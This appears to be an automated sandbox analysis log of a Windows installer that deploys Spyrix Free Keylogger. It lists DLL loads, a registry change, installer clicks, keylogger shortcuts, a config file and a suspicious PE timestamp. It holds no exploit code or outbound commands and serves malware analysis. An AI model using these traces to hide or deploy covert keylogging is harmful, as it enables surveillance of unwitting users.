Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: globinputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\reg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH

Source: Spyrix Free Keylogger.lnk.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.22.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Gmail.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.69.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

Window found: window name: TSelectLanguageForm

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >

Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Binary contains a suspicious time stamp

Source: [space]= .exe.6.dr

Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]

PE file contains sections with non-standard names

Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
